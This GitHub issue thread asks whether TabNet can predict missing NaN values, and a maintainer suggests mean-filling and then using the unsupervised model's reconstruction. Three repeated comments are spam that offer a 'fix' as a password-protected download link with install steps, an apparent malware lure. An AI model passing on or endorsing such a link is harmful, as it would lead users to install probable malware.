### ISSUE TITLE
Can NaN data be predicted?

### ISSUE THREAD

**Issue by sooyoung-wind** [dreamquark-ai/tabnet#555]
## Feature request

**What is the expected behavior?**
I want to fill in missing values ​​using TabNet. While studying TabNet, I thought it might have this feature, so I'm testing it. However, in the unsupervised learning process, there is a process of learning using a mask, but there does not seem to be a process of predicting by treating missing values ​​(NaN) as a mask when predicting.

**What is motivation or use case for adding/changing the behavior?**
I'm looking for a way to fill in missing values. I want to predict the relationships between various features through a network.

**How should this be implemented in your opinion?**
When predicting in unsupervised learning, I hope that it will be implemented so that missing values ​​can be processed as a mask to make predictions.

**Are you willing to work on this yourself?**
I don't know if it's possible because I don't understand the entire code yet.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Optimox** [comment]
I don't think TabNet would be the right choice for filling missing values, as simple auto encoder would probably do the trick. If you still want to predict missing values, you could fill with mean values, then train the semi supervised model, and replace missing values by what the unsupervised model reconstructs. Again, I don't think that TabNet is the right tool for your problem.

**Comment by sooyoung-wind** [comment]
You mention that "If you still want to predict missing values, you could fill with mean values, then train the semi supervised model, and replace missing values by what the unsupervised model reconstructs."
I want to test how much of a difference there is. A more detailed explanation is needed. An error occurs if NaN data is entered in the prediction step. They say that NaN is not allowed in the code, but this error seems to need to be corrected. If there is another way, please let me know.
It's so hard to find this information. I hope tabnet grows into a good model.

**Comment by sooyoung-wind** [comment]
@Optimox I would appreciate your reply.

**Comment by Optimox** [comment]
- replace your missing value by mean
- train and predict with semi supervised model
- replace your previously missing value by the predictions of the semi supervised model.
Again, I don't think this is the right thing to do.

**Comment by sooyoung-wind** [comment]
Thank you for your comments. Have a nice day @Optimox
